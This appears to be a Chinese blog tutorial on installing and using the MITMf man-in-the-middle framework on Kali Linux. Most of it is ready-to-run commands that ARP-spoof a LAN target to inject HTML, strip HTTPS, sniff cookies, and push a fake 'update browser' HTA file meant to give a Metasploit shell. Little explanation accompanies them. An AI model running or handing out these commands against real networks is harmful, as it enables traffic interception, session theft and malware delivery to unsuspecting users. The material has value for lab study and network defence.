局域网中间人：MITMf使用

Posted 2020-10-20 方方和圆圆

　　系统环境：kali

　　安装流程参考github官方地址：https://github.com/byt3bl33d3r/MITMf/wiki/Installation

　　安装相关依赖：

apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file

　　下载项目：

git clone https://github.com/byt3bl33d3r/MITMf

　　安装相关的子项目和依赖：

cd MITMf && git submodule init && git submodule update --recursive

　　安装相关依赖：

pip install -r requirements.txt

　　启动并查看MITMf的帮助文件：

python mitmf.py -h

 　　MITMf的插件挺多的

 　　基本功能介绍

 　　在网页中注入html代码：

python mitmf.py -i wlan0 --spoof --arp  --target 172.16.42.131 --gateway 172.16.42.1 --inject --html-payload \'<h1>6666666666666666666</h1>\'

 　　让目标机器浏览的图片全部翻转：

python mitmf.py -i wlan0 --spoof --arp  --target 172.16.42.131 --gateway 172.16.42.1  --upsidedownternet 

　　启动sslstrip，把所有的https请求转化为http请求

python mitmf.py -i wlan0 --spoof --arp  --target 172.16.42.131 --gateway 172.16.42.1 --hsts 

 

 　　在目标机器的 网页中注入 hta 文件， 诱导用户下载， 配合metaspolit可以直接得到shell：

python mitmf.py -i wlan0 --spoof --arp  --target 172.16.42.131 --gateway 172.16.42.1  --hta --text "更新浏览器" 

 　　监听目标用户的cookies

python mitmf.py -i wlan0 --spoof --arp  --target 172.16.42.131 --gateway 172.16.42.1  --ferretng

 　　总体来说， 功能非常强大，但是运行的时候， 被攻击的目标机器经常会卡死， 导致网页无法打开 ， 用户体验不好， 所以还是用bettercap更靠谱

作者： NONO
出处：http://www.cnblogs.com/diligenceday/
企业网站：http://www.idrwl.com/
开源博客：http://www.github.com/sqqihao
QQ：287101329
微信：18101055830